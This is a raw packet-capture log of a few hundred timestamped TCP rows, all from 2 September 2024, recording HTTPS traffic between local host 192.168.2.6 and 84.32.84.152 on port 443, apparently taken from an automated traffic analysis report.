Sep 2, 2024 08:21:15.300417900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300426960 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.300452948 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.301011086 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.320420027 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.320455074 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.320533037 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.320558071 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.320579052 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.320600986 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.380682945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.380764961 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.380774975 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.380824089 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.380851030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.380877972 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.380912066 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.380939960 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.380948067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.380983114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.381006002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.381015062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.381038904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.381048918 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.381071091 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.381124020 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.381124973 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.381135941 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.381165028 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.381184101 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.381226063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.381279945 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.381289005 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.381350994 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382148027 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382179022 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382205963 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382220030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382226944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382245064 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382280111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382344007 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382352114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382392883 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382412910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382441998 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382464886 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382474899 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382492065 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382510900 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382531881 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382582903 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382635117 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382678032 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382786989 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382819891 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382838011 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382843018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382872105 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382885933 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.382893085 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382904053 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.382949114 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383058071 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383096933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383116007 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383121967 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383133888 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383137941 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383174896 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383177042 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383186102 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383219957 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383223057 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383229017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383258104 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383260012 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383279085 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383284092 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383296967 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383307934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383330107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383336067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383348942 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383374929 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383380890 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.383408070 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.383924007 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.403106928 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.403152943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.403204918 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.403215885 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.403248072 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.449084997 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.464524031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.464602947 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.464688063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.464739084 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.464749098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.464759111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.464799881 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.464808941 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.464852095 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.464893103 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.464899063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.464939117 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465188026 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465220928 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465240955 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465246916 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465260029 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465269089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465286016 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465291023 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465321064 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465367079 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465411901 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465420008 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465457916 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465498924 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465533018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465552092 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465558052 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465581894 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465594053 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465596914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465605021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465643883 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465652943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465701103 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465753078 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465784073 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465806961 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465812922 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.465823889 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.465852022 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466078043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466128111 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466191053 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466265917 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466356039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466398001 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466419935 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466425896 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466435909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466449976 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466465950 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466470957 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466495991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466586113 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466594934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466600895 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466633081 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466659069 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466660976 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466670036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466712952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466814995 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466846943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466865063 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466872931 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466883898 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466885090 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466933966 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.466941118 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.466981888 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.467072964 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.467118979 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.467120886 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.467130899 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.467161894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.467164040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.467184067 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.467189074 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.467209101 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.467216969 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.467261076 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.467266083 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.467300892 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.468036890 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.486371040 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.486455917 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.486483097 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.486491919 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.486537933 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676249027 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676302910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676346064 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676353931 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676372051 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676388025 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676408052 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676426888 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676436901 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676444054 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676474094 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676511049 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676556110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676563978 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676569939 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676598072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676613092 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676619053 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676630974 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676661015 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.676863909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.676909924 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677000046 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677033901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677045107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677061081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677069902 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677073002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677109957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677119017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677158117 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677176952 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677222967 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677237034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677284956 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677464962 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677505016 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677603960 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677643061 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677645922 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677654028 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677696943 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677856922 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677887917 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677913904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677920103 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677930117 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.677966118 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.677999973 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678028107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678035021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678046942 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678055048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678092003 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678097010 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678145885 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678199053 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678222895 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678246975 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678252935 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678258896 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678282022 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678287983 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678297997 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678306103 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678318024 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678328991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678359032 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678360939 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678373098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678406000 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678406954 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678442955 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678443909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678455114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678488970 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678497076 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678503036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678533077 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678544044 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678587914 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678621054 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678638935 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678646088 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.678672075 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.678683043 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.679676056 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759098053 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759135962 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759216070 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759229898 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759242058 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759258986 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759270906 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759280920 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759294033 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759304047 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759329081 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759339094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759347916 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759355068 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759382010 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759383917 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759433031 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759438992 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759475946 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759485960 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759521961 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759531975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759537935 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759563923 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759576082 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759628057 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759660006 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759671926 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759676933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759701967 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759716988 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759793043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759838104 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759865999 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759907007 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759907961 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.759917021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.759946108 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760005951 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760042906 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760051012 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760087013 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760221004 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760265112 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760317087 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760356903 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760385036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760427952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760457039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760497093 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760565042 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760606050 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760607958 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760617018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760643959 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760658979 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760727882 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760772943 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.760799885 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760837078 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.760850906 CEST	49744	443	192.168.2.6	84.32.84.152
